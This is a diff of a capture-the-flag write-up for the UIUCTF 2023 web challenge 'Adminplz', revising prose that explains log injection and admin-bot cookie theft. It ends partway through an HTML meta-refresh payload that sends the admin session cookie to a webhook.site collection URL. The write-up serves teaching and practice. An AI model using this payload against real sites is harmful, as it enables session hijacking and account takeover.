christiancioffi/CTF_Write-ups/UIUCTF_2023/WEB/Adminplz/README.md

         return app.getResource(isAdmin(req, session) ? view : "error.html");
     }
 ```
-Here, two things: our username could be written inside a log (<code>/var/log/adminplz/latest.log</code>) without any sanitizing process and
+Here, two things: our username could be written inside a log (<code>/var/log/adminplz/latest.log</code>) without going through any sanitization process and
-a resource specified by a user controllable GET parameter (<code>view</code>) is returned to the admin (if the endpoint is accessed by the admin).
+a resource specified by a user-controllable GET parameter (<code>view</code>) is returned to the admin (if they access the endpoint).
-<code>accessResource()</code> method accepts file names and urls (of any protocol).<br>
+The <code>accessResource()</code> method accepts filenames and URLs (of any protocol).<br>
-There is no possibility for an XSS, nor a possibility to inject anything on any page.
-The only file where we can inject something, if we are logged and
+There is no possibility for an XSS, nor possibility to inject anything on any page.
+The only file we can inject something into, if we are registered and
-the <code>view</code> parameter contains the "flag" substring, is <code>/var/log/adminplz/latest.log</code>.
-This file can be rendered as HTML by the bot's browser.
+the <code>view</code> parameter contains the substring "flag", it is <code>/var/log/adminplz/latest.log</code>.
+This file can be viewed as HTML by the bot's browser if required (via the <code>/admin</code> endpoint and the <code>view</code> parameter).
-Submitting an url like <code>http://127.0.0.1:8080/admin?view=file:///var/log/adminplz/latest.log</code> will induce the admin bot to view the log file as an HTML page.
+Sending a url like <code>http://127.0.0.1:8080/admin?view=file:///var/log/adminplz/latest.log</code> will cause the admin bot to view the log file as an HTML page.
-But, what we can do?
-We can't trigger XSS nor load any external resource.
-We can't get the /flag.html content.
+But what can we do?
+We cannot activate XSS or load any external resources.
+Therefore, it is impossible to get the content of <code>/flag.html</code>.
 Can we steal cookies even without XSS?
-Yes.
+Yes!
-If we look at the code above (the admin one), we can that not only the username is injected inside the log, but the session ID too.
-So, if admin visits a url
+If we look at the code above (the admin one), we can see that not only the username is registered, but also the session ID.
+If the admin visits a url
-like <code>http://127.0.0.1:8080/admin?view=file:///flag.html</code>, its session ID (authentication cookie) is written into the log.
+such as <code>http://127.0.0.1:8080/admin?view=file:///flag.html</code>, its session id (authentication cookie) is written to the log.
 If we can exfiltrate this,
-we can authenticate us as admin to the server.
-In the log there is only text, but we can inject, through the username, HTML code.
+we can authenticate to the server as admin.
+There is only text in the log, but we can insert HTML through the username.
 How can we exfiltrate the admin cookie with a very strict CSP policy?
-With a <code>meta</code> tag that redirects the client to an URL that
+With a <code>meta</code> tag that redirects the client to a URL that
-incorporate part of the log's content (admin's cookie included):
+incorporates part of the content of the log (administrative cookies included) inside it:
 ```html
 .... <html><head><meta http-equiv="refresh" content='0; url=https://webhook.site/a2e16dd2-9690-4246-8c58-abf303c42a4b?exf=